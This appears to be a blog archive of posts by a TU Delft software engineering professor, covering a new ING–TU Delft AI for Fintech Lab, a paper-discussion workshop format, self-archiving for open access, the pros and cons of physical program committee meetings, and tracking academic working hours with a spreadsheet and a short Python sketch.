Over the next five years, ten PhD researchers will work in the lab. Research topics will include human-centered software analytics, autonomous software engineering, analytics delivery, data integration, and continuous experimentation.

AFL will be bi-located at the ING campus Amsterdam and the TU Delft campus in Delft, bringing together students, engineers, researchers, professors, and entrepreneurs from both organizations at both locations.

ICAI Logo

AFL will join the Innovation Center for Artificial Intelligence (ICAI) as one of its labs. ICAI is a virtual organization consisting of a series of labs of similar size (over five PhD researchers each) funded directly by industry. AFL will benefit from the experience and expertise of other academic and industrial ICAI partners, such as Qualcomm, Bosch, Ahold Delhaize, the Dutch National Police, the University of Amsterdam, and Utrecht University.

As scientific director of the brand new AI-for-Fintech Lab, I look forward to this exciting, long term collaboration between ING and TU Delft.

And, yes, we are hiring!

If you’re interested in bringing together industry and academia, if you’re not afraid to work at two locations, and if you have a strong background in computer science (software engineering, artificial intelligence, data science), you are welcome to apply as a PhD student! Details about the application process will follow soon.

Besides PhD students, we will have related positions for postdoctoral researchers and scientific programmers. And of course, TU Delft BSc students and MSc students are welcome to conduct their research projects within the AI for Fintech Lab!

I look forward to a great collaboration spanning at least five years, with exciting new results in the areas of AI, data science, and software engineering!

ING, AFL, and TU Delft logos

Writers and Collaborators Workshops

In September this year we will organize a Lorentz workshop in the area of software analytics and big software. Lorentz workshops take place in the Lorentz Center in Leiden, and are somewhat similar to the Dagstuhl seminars common in computer science: A small group, a week long retreat, and a focus on interaction and collaboration.

Workshop poster

To make this interaction happen, we will experiment with “writer’s and collaborator’s workshops”, inspired by Writer’s Workshops for design patterns.

The workshops we have in mind are short (1-2 hour) sessions, in which a small group of participants (the “discussants”) study one or more papers (proposed by the “author”) in depth.

The primary objective of the session is to provide feedback on the paper to the author. This feedback can relate to any aspect of the paper, such as the experimental setup, the related work, the precise objective, future work that can be carried out to build upon these results, etc.

Besides that, the discussion of each paper serves to explore possible (future) collaborations between any of the participants. Thus, discussants can bring in their own related work, and explore how joining forces can help to further advance the paper’s key results.

The setup of the workshops draws inspiration from Writer’s Workshops commonly used in the design patterns community, which in turn were inspired by workshops in the creative literature community. Pattern workshops have been used to review, evaluate, and improve pattern descriptions. At the same time, the process is akin to a peer review process, except that the objective is not paper selection, but in-depth discussion between authors and participants about the key message of a paper.

The specific format we propose is as follows.

The preparation phase aims to match authors and discussants. Using a conference paper management system like EasyChair, the steps include:

  1. Authors submit the paper they would like to have discussed. This can be a paper currently under review (e.g., their most recent ICSE submissions), a draft version of a paper they would like to submit, or an already published paper they would like to expand (for example for a journal submission).

  2. All workshop participants can see all papers, and place “bids” on papers they would be particularly interested in studying in advance.

  3. Papers and participants are grouped into coherent units of 3-4 papers and around 10 participants each.

  4. Each paper to be discussed gets assigned at least three discussants, based on the groups and bids.

  5. Discussants study the assigned papers in advance, and compile a short summary of each paper and its main strengths and points for improvement.

Each actual workshop will take 1-2 hours, have up to 10 participants, and include the discussion of 2-3 papers, using 30-45 minutes per paper. We propose the following format:

  1. For each workshop, we assign one moderator to steer the process.

  2. One of the discussants is assigned to summarize the paper in around 5 minutes, and explain it to the participants.

  3. Each discussant explains what he or she particularly liked about the paper.

  4. Each discussant identifies opportunities for possible improvements to the paper.

  5. Workshop participants who did not review the paper themselves offer their perspectives on the discussion, including areas of further work.

  6. After this, the author can step in, and respond to the various points raised.

  7. As the discussion concludes, the moderator provides a summary of the main findings of the discussion of this paper.

  8. The process is repeated for the next paper, rotating the author, moderator, and discussant roles.

If you have ever attended a physical PC meeting, you will recognize our attempt to keep some of the good parts of a PC meeting, without the need to make any form of “acceptance” decision.

Since several of the lessons learned during such a session will transcend the individual papers discussed, we will also use plenary sessions in which each of the moderators can summarize the main findings of their workshops, and share them with everyone.

As also emphasized by the patterns community, this format requires a safe setting with participants who trust each other. In particular:

  • Papers discussed are confidential: Authors need not be scared that participants “steal” their ideas;
  • Feedback is directed at the work rather than the author, preserving the dignity of the author.

Clearly, such a “writers and collaborators workshop” does require work from the participants, both in terms of following the protocol and in preparing the discussions. So we will have to see if it really works or whether some adjustments are necessary.

Yet this format does provide an excellent way to truly engage with each other’s research, and we look forward to the improved research results and future collaborations that will emerge from this.

If you have any experience with formats like this, please let me know!


P.S. We still have some places available in the workshop, so contact me if you are interested in participating.

The Battle for Affordable Open Access

Last week, Elsevier cut off thousands of scientists in Germany and Sweden from reading its recent journal articles, when negotiations over the cost of a nationwide open-access agreement broke down.

In these negotiations, universities are trying to change academic publishing, while publishers are defending the status quo. If you are an academic, you need to decide how to respond to this conflict:

  1. If you don’t change your own behavior, you are choosing Elsevier’s side, helping them maintain the status quo.
  2. If you are willing to change, you can help the universities. The simplest thing to do is to rigorously self-archive all your publications.

The key reason academic publishing needs to change is that academic publishers, including Elsevier, realize profit margins of 30-40%.

Euro bills

To put this number in perspective, consider my university, TU Delft. Our library spends €4-5 million each year on (journal) subscriptions. 30-40% of this amount, €1-2 million each year, ends up directly in the pockets of the shareholders of commercial publishers.

This is unacceptable. My university needs this money: to handle the immense workload coming with ever increasing student numbers, and to meet the research demands of society. A university cannot afford to waste money by just handing it over to publishers.

Universities across Europe have started to realize this. The Dutch, German, French, and Swedish universities have negotiated at the national level with publishers such as Springer Nature, Wiley, Taylor & Francis, Oxford University Press, and Elsevier (the largest publisher). In many cases deals have been made, with more and more options for open access publishing, at prices that were acceptable to the universities.

However, in several cases no deals have been made. The Dutch universities could not agree with the Royal Society of Chemistry Publishing, the French failed with Springer Nature, and now Germany and Sweden could not come to agreement with Elsevier. A common point of contention is that universities are only willing to pay for journal subscriptions if their employees can publish open access without additional article processing charges — a demand that directly challenges the current business model in academic publishing.

The negotiations are not over yet. Both in terms of open access availability and in terms of price, publishers are far from where the universities want them to be. And if the universities do not negotiate themselves, taxpayers and governments could simply force them, by putting a cap on the amount of money universities are allowed to spend on journal subscriptions.

Universities are likely to join forces, also across nations. They will determine maximum prices, and will not be willing to make exceptions. The negotiations will be brutal, as the publishers have much to lose and much to fight for.

In all these negotiations it is crucial that universities take back ownership of what they produce. Every single researcher can contribute, simply by making all of their own papers available on their institutional (pure.tudelft.nl for my university) or subject repositories (e.g., arxiv.org). This helps in two ways:

  • It helps researchers cut off (Germans and Swedes as we speak) from publishers in case negotiations fail.
  • It reduces the publishers’ power in future negotiations as the negative effects of cancellations have been reduced.

This seems like a simple thing to do, and it is: It should not take an average researcher more than 10 minutes to post a paper on a public repository.

Nevertheless, during my two years as department head I have seen many researchers who fail to see the need or take the time to upload their papers. I have begged, prayed, and pushed; I wrote a green open access FAQ to address any legal concerns researchers might have, and a step-by-step guide on how to upload a paper.

Open Access Adoption at TU Delft

On top of that, my university, like many others, has made it compulsory for its employees to upload their papers to the institutional repository (this is not surprising since TU Delft plays a leading role in the Dutch negotiations between universities and publishers). Furthermore, both national (NWO) and European (H2020, Horizon Europe) funding agencies insist on open access publications.

Despite all this, my department barely meets the university ambition of having 60% of its 2018 publications available as (green or gold) open access. To the credit of my departmental colleagues, however, they do better than many other departments. Also, the share of papers with pre-print links uploaded to conference sites has typically been below 60%, suggesting that the culture of self-archiving in computer science leaves much to be desired.

If anything, the recent cut off by Elsevier in Sweden and Germany emphasizes the need for self-archiving.

If you’re too busy to self-archive, you are helping Elsevier getting rich from public money.

If you do self-archive, you help your university explain to publishers that their services are only needed when they bring true value to the publishing process at an affordable price.


© Arie van Deursen, 2018. Licensed under CC BY-SA 4.0.

Euro image credit: pixabay, CC0 Creative Commons.

My Last Program Committee Meeting?

This month, I participated in what may very well have been my last physical program committee (PC) meeting, for ESEC/FSE 2018. In 2017, top software engineering conferences like ICSE, ESEC/FSE, ASE and ISSTA (still) had physical PC meetings. In 2019, these four will all switch to online PC meetings instead.

I have participated in almost 20 such meetings, and chaired one in 2017. Here is what I learned and observed, starting with the positives:

  1. As an author, I learned the importance of helping reviewers to quickly see and concisely formulate the key contributions in a way that is understandable to the full PC.

  2. As a reviewer I learned to study papers so well that I could confidently discuss them in front of 40 (randomly critical) PC members.

  3. During the meetings, I witnessed how reviewers can passionately defend a paper as long as they clearly see its value and contributions, and how they will kill a paper if it has an irreparable flaw.

  4. I started to understand reviewing as a social process in which reviewers need to be encouraged to change their minds as more information unfolds, in order to arrive at consensus.

  5. I learned phrases reviewers use to permit them to change their minds, such as “on the fence”, “lukewarm”, “not embarrassing”, “my +1 can also be read as a -1”, “I am not an expert but”, etc. Essential idioms to reach consensus.

  6. I witnessed how paper discussions can go beyond the individual paper, and trigger broad and important debate about the nature of the arguments used to accept or reject a paper (e.g. on evaluation methods used, impact, data availability, etc.).

  7. I saw how overhearing discussions of papers reviewed by others can be useful, both to add insight (e.g. additional related work) and to challenge the (nature of the) arguments used.

  8. I felt, when I was PC co-chair, the pressure from 40 PC members challenging the consistency of any decision we made on paper acceptance. In terms of impact on the reviewing process, this may well be the most important benefit of a physical PC meeting.

  9. I experienced how PC meetings are a great way to build a trusted community and make friends for life. I deeply respected the rigor and well articulated concerns of many PC members. And nothing bonds like spending two full days in a small meeting room with many people and insufficient oxygen.

I also witnessed some of the problems:

  1. My biggest struggle was the incredible inefficiency of PC meetings. They take 1-2 days from 8am to 6pm; you are present at discussions of up to 100 papers, each discussed in 5-10 minutes, yet you actively participate in fewer than 10 of them, in some cases just one or two.

  2. I had to travel long distances just for meetings. Co-located meetings (e.g. the FSE meeting is typically immediately after ICSE) reduce the footprint, but I have crossed the Atlantic multiple times just for a two day PC meeting.

  3. My family paid a price for my absence caused by almost 20 PC meetings. I have missed multiple family birthdays.

  4. The financial burden on the conference (meeting room plus 40 dinners and 80 lunches, around €5,000) and on each PC member (travel and 2-3 hotel nights, easily adding up to €750 per person) is substantial.

  5. I saw how vocal PC members can dominate discussions, leaving less opportunity for the more timid PC members who need more time to think before they dare to speak.

  6. Almost every PC meeting I attended had at least a few PC members who eventually had to cancel their trip and, at best, participated via Skype. This gives the papers reviewed by these PC members a different treatment. When I co-chaired ESEC/FSE, we had five PC members who could not make it, all for valid (personal, painful) reasons. I myself had to cancel one PC meeting a week before the meeting, when one of my children had serious health problems.

  7. Insisting on a physical PC meeting limits the choice of PC members: when inviting 40 PC members for ESEC/FSE 2017, we had 20 candidates decline our invitation because they could not commit, a year in advance, to attending a PC meeting (in Buenos Aires).

Taking the pros and cons together, I have come to believe that the benefits do not outweigh the high costs. It must be possible to organize an online PC meeting with special measures to keep the good parts (quality control, consistent decisions, overhearing/inspecting each other’s reviews, …).

I look forward to learning from the ICSE, ESEC/FSE, ISSTA and ASE experiences in 2019 and beyond about best practices for organizing a successful online PC meeting.

In principle, ICSE will have online PC meetings in 2019, 2020, and 2021, after which the steering committee will evaluate the pros and cons.

As ICSE 2021 program co-chairs, Tao Xie and I are very happy about this, and we will do our best to turn the ICSE 2021 online PC meeting into a great success for the authors, the PC members, and the ICSE community. Any suggestions on how to achieve this are greatly appreciated.

T-Shirt saying "Last PC Meeting Ever?"

Christian Bird realized the ESEC/FSE 2018 PC meeting might be our last, and decided this nostalgic moment deserved a T-shirt of its own. Thanks!!


(c) Arie van Deursen, June 2018.

Academic Hour Tracking: Why, When, How

One tool I find indispensable in managing my time is keeping track of how I spend my working hours. During the past years, I have tracked my time at the hour level, split across around 20 tasks, grouped into three high level categories corresponding to my main responsibilities (management, research, teaching).

Keeping track of hours has helped me as follows:

  1. Formulating a strategy: Thinking in terms of hours spent per week forces me to formulate a bigger strategy for how I wish to spend my time: I want to work around 40 hours per week, divided evenly over management, research, and teaching.

  2. Identifying time sinks: Activities that take more time than expected become visible. This need not be a problem per se, but making time sinks explicit helps me to adjust the planning of my other activities.

  3. Keeping commitments: Seeing my time spent helps me understand if I keep my commitments. For example, my hour sheets will tell me when I spent substantially less time on one PhD student compared to another, so that I can take action.

  4. Rewarding myself: When I’m in a week with, e.g., clearly too much management, I have a good reason to cut down organizational duties the next week, and engage in some research instead (without feeling “guilty” about this).

  5. Planning my work: My sheets of the previous year help me in planning the current year.

  6. Organizational change: Knowing how much time activities take gives me a great starting point for an informed debate about organizational change — within the department, university, with my boss, or in my research community.

  7. Slowing down: My sheets tell me when there is a busy period, and that I need to slow down.

  8. Regaining control: Stress is a factor in (academic) life, and I’m not immune to it. Regaining control over my time by seeing what I do is a stress management tool I can’t live without.

  9. Yearly appraisal: In my annual performance review with my superiors I can indicate with confidence how much effort my various responsibilities required.

My approach to keeping hours is simple and low tech: I just use a spreadsheet:

  • It has columns for my activity types (around 20) grouped together into three high level categories.

  • It has one row for each day.

  • A cell contains the number of hours spent on an activity on a given day. I always use round numbers (full hours), but I know others who track at the level of 15 minutes.

  • The top row aggregates the time and percentages of the activities: I can, e.g., see that I spent 10% of my time on course X, and 5% of my time reviewing for conference Y.

  • I have aggregating columns giving the time spent that day, the total time spent the last week, and the average time spent per week over the full measuring period.

I typically use a spreadsheet for half a year, and then start a fresh one with adjusted columns. Whenever an activity takes more than 10% of my time, I try to split it into smaller ones, to better see what is taking so much time.
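The bookkeeping behind the spreadsheet is simple enough to sketch in a few lines of code. Below is a minimal illustration, assuming a hypothetical layout of one row (dict) per day mapping activity names to whole hours; all activity names and numbers are invented. It computes the per-activity totals and percentages of the aggregating top row, and flags activities above the 10% splitting threshold.

```python
from collections import defaultdict

# Hypothetical data: one dict per day, activity -> hours (whole hours).
days = [
    {"course X": 5, "dept meetings": 4, "email": 1},
    {"course X": 4, "PhD supervision": 3, "reviewing Y": 2},
    {"course X": 3, "dept meetings": 4, "PhD supervision": 2,
     "reviewing Y": 1, "email": 1},
]

# Total hours per activity over the full measuring period.
totals = defaultdict(int)
for day in days:
    for activity, hours in day.items():
        totals[activity] += hours

grand_total = sum(totals.values())

# Percentage per activity, like the aggregating top row of the sheet.
percentages = {a: 100 * h / grand_total for a, h in totals.items()}

# Activities above 10% are candidates for splitting into smaller ones.
to_split = sorted(a for a, p in percentages.items() if p > 10)

print(grand_total)   # total hours tracked
print(to_split)      # activities worth splitting further
```

A real spreadsheet adds the daily and rolling weekly sums as extra columns, but the core of the method is just this kind of grouping and percentage calculation.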

The bigger categories can sometimes raise interesting questions: Is reviewing research? Is project acquisition and proposal writing research? Is supervising a master student research? But whatever the categories, these activities take time, and monitoring them makes explicit how much.

I usually fill in my spreadsheet at the end of the day or the end of the week. I use my memory, calendar, and sometimes my email archives to remember what I did. For my purposes, this is sufficiently precise. Filling in the sheet takes me less than 15 minutes — and while filling it in I am forced to reflect on how I spend my time.

If you’re interested in following a similar approach, I’ve created an empty template spreadsheet for download. An alternative is to use the BubbleTimer app and service (which Jonathan Aldrich uses).

If you’re struggling with your time, try tracking it: it has helped me, and hopefully it will help you too!


(c) Arie van Deursen, April 2018. CC-BY-SA-4.0.



Image: Astronomical clock, Strasbourg. Credit: Pascal Subtil, Flickr, CC-BY-2.0